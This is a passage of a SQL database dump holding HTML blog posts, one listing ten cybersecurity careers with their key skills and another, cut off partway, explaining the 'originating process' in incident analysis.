'draft', '2025-01-23 20:01:38', '2026-01-12 21:41:44', 'Information Security', 'Top Linux Distributions and Virtual Machines for Cybersecurity Professionals', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(59, '10 Best Careers in Cybersecurity for 2025', '10-best-careers-in-cybersecurity-for-2025', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity has become a crucial field in today’s internet-driven world, and its importance will only grow as we approach 2025. Fast-paced advancements in technology bring with them emerging threats, pushing businesses and governments to invest heavily in defending their digital assets. This wave of demand has created a wealth of career opportunities for cybersecurity professionals—and with high salaries, job security, and the chance to make a real-world impact, it’s never been a better time to pursue a career in this field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here are the <b><strong class=\"font-bold\">10 best careers in cybersecurity for 2025</strong></b>, based on current trends, evolving roles, and future needs.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Cybersecurity Analyst</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A cybersecurity analyst is responsible for managing a company’s security measures and defending against potential breaches. They use various <b><strong class=\"font-bold\">cybersecurity techniques</strong></b> to detect, analyze, and mitigate risks. This role often involves reviewing incident logs, analyzing potential threats, and implementing proactive security measures.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Familiarity with intrusion detection systems</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Practical knowledge of the <b><strong class=\"font-bold\">OWASP Top 10 </strong></b> guidelines</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Expertise in <b><strong class=\"font-bold\">incident analysis</strong></b> and response</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rise in sophisticated <b><strong class=\"font-bold\">cybersecurity incidents</strong></b>, businesses need analysts who can protect sensitive data and mitigate risks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Penetration Tester (Ethical Hacker)</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Penetration testers, also known as white-hat hackers, simulate cyberattacks to identify vulnerabilities in a system before malicious agents find them. They ensure systems and networks are airtight by regularly stress-testing security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Vulnerability analysis</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Strong understanding of <b><strong class=\"font-bold\">OWASP Top 10 vulnerabilities</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Expertise in <b><strong class=\"font-bold\">advanced cybersecurity techniques</strong></b></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With proactive defense strategies becoming more critical, penetration testing is essential for businesses aiming to stay ahead of potential threats.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Incident Responder</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Incident responders act as the first line of defense during a cyberattack. They work on containing threats, analyzing causes, and providing solutions to prevent similar breaches in the future.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Incident detection and <b><strong class=\"font-bold\">response analysis</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Knowledge of <b><strong class=\"font-bold\">cybersecurity trends 2025</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Crisis management</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The increasing number of high-profile <b><strong class=\"font-bold\">cybersecurity incidents</strong></b> means organizations must have dedicated professionals to respond effectively.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Cloud Security Engineer</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With businesses migrating to cloud-based storage solutions, protecting sensitive data in the cloud is now more critical than ever. Cloud security engineers design and implement secure systems that shield users from breaches and attacks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Encryption standards</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Secure cloud architecture design</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Expertise in safeguarding <b><strong class=\"font-bold\">privacy online</strong></b></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The rise of cloud-powered enterprises places massive responsibility on cloud security engineers to ensure data remains secure and compliant.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Threat Intelligence Analyst</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Threat intelligence analysts research, identify, and monitor emerging threats to cybersecurity. They keep enterprises informed of potential future risks and advise on necessary precautions.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Threat evaluation and risk trends</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Deep understanding of <b><strong class=\"font-bold\">cybersecurity techniques</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Reporting and intelligence-based analysis</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Companies are increasingly taking preventive measures to avoid costly breaches. Threat intelligence analysts give businesses valuable foresight.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Chief Information Security Officer (CISO)</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A CISO acts as the captain of an organization’s cybersecurity efforts. They oversee strategies, ensure compliance, and advise leadership about investments in cybersecurity infrastructure.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Leadership and strategy development</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Knowledge of <b><strong class=\"font-bold\">cybersecurity trends 2025</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Risk management expertise</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With boards and investors placing cybersecurity at the forefront of business priorities, the CISO role has grown significantly in prominence.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. <b><strong class=\"font-bold\">Privacy Engineer</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Privacy engineers focus on integrating privacy controls into systems and applications. They ensure that organizations respect user privacy while complying with regulations like GDPR and CCPA.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Expertise in data protection laws</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Designing systems that enable users to remain <b><strong class=\"font-bold\">invisible on the internet</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Familiarity with <b><strong class=\"font-bold\">internet privacy</strong></b> tools</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Privacy continues to be a growing concern, and consumers increasingly demand secure platforms that protect their data from misuse.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. <b><strong class=\"font-bold\">Application Security Engineer</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Application security engineers design secure applications by identifying vulnerabilities, implementing best practices, and testing for flaws. They ensure all software builds are resilient to attacks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Knowledge of <b><strong class=\"font-bold\">OWASP Top 10 vulnerabilities</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Secure coding techniques</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Security testing methodologies</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Businesses are constantly developing new applications, and safeguarding these through secure development processes is crucial.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">9. <b><strong class=\"font-bold\">Forensic Expert in Cybersecurity</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity forensic experts investigate breaches, recover stolen data, and identify perpetrators. This role intersects law enforcement with cybersecurity knowledge.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Data recovery and analysis</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Evidence collection from digital media</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Expertise in <b><strong class=\"font-bold\">originating process</strong></b> of a cyberattack</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With an increasing emphasis on investigating and prosecuting cybercrime, forensic experts play a key role in delivering justice.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10. <b><strong class=\"font-bold\">Cybersecurity Consultant</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A cybersecurity consultant works freelance or with firms to advise multiple organizations on improving their security posture. They create tailored security programs based on industry-specific vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Cross-industry knowledge of <b><strong class=\"font-bold\">cybersecurity techniques</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Risk assessment and strategic planning</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Communication and presentation skills</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The flexibility of hiring consultants on a project basis makes them a high-demand role for startups, SMBs, and large corporations alike.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Preparing for the Future of Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is evolving rapidly, and staying ahead means constant learning. To thrive in this domain in 2025, consider steps such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Upskilling</strong></b> with certifications like CISSP, CEH, or CompTIA Security+.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Keeping track of <b><strong class=\"font-bold\">cybersecurity trends for 2025</strong></b> to anticipate industry demands.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Gaining hands-on experience with tools addressing <b><strong class=\"font-bold\">internet privacy</strong></b> and defense against emerging threats.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity offers some of the most exciting and impactful career paths available today. With roles demanding diverse skill sets, a variety of opportunities exist for learners, professionals, and enthusiasts alike. Whether you’re passionate about protecting against <b><strong class=\"font-bold\">cybersecurity incidents</strong></b>, ensuring <b><strong class=\"font-bold\">privacy online</strong></b>, or analyzing sophisticated <b><strong class=\"font-bold\">incident analysis</strong></b>, there’s a career in cybersecurity for everyone.</p>', '', NULL, NULL, 1, 'draft', '2025-01-23 19:54:16', '2026-01-12 21:41:44', 'Information Security', '10 Best Careers in Cybersecurity for 2025', '', NULL),
(60, 'Understanding the Originating Process in Cybersecurity', 'understanding-the-originating-process-in-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When a cybersecurity incident occurs, getting to the root cause is crucial. One of the most significant aspects of incident analysis is identifying the \"originating process.\" But what exactly does this term mean, and why is it so important for cybersecurity professionals and privacy enthusiasts?</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog dives deep into the concept of the originating process, its role in incident analysis, and the most frequently seen originating processes in attacks. Whether you\'re a seasoned cybersecurity expert or a curious learner, this guide will help you understand how analyzing originating processes can enhance internet privacy and protection against cyber threats.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is the Originating Process in Cybersecurity?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The originating process refers to the root or initial process within a system that triggers a cyberattack or suspicious activity. Essentially, it’s where everything begins. Identifying this process is key because it provides essential clues about how an incident unfolded, the entry points attackers used, and which programs or systems were compromised first.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For example, if malicious activity is detected on a compromised computer, identifying its originating process could reveal whether the attack was initiated by a phishing email attachment, a vulnerable application, or a malicious script running in the background.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Why is this critical? By discovering the originating process, cybersecurity professionals can better understand attack vectors, patch vulnerabilities, and improve defenses to prevent future incidents.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why the Originating Process Matters in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s why the originating process is vital in cybersecurity practices and incident response:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Root Cause Analysis:</strong></b> It helps determine how and why an incident occurred.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Enhanced Threat Intelligence:</strong></b> By studying originating processes, security teams can identify patterns in attacks and refine their threat analysis.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Improved Defense Mechanisms:</strong></b> Understanding how attacks originate allows professionals to fortify defenses and create more resilient systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Incident Mitigation:</strong></b> Identifying the source of malicious activity improves response times and limits the impact of an attack.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Most Common Originating Processes Seen in Cybersecurity Incidents</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity incidents can stem from various originating processes. Here are the most frequently observed ones during incidents, along with how they impact security landscapes:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Email Attachments and Phishing Links</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing remains one of the most common originating processes behind cyber incidents like ransomware infections and data breaches. Malicious email attachments or links trick users into opening a door for attackers.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Email is a universal medium that attackers exploit due to human error and lack of awareness.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 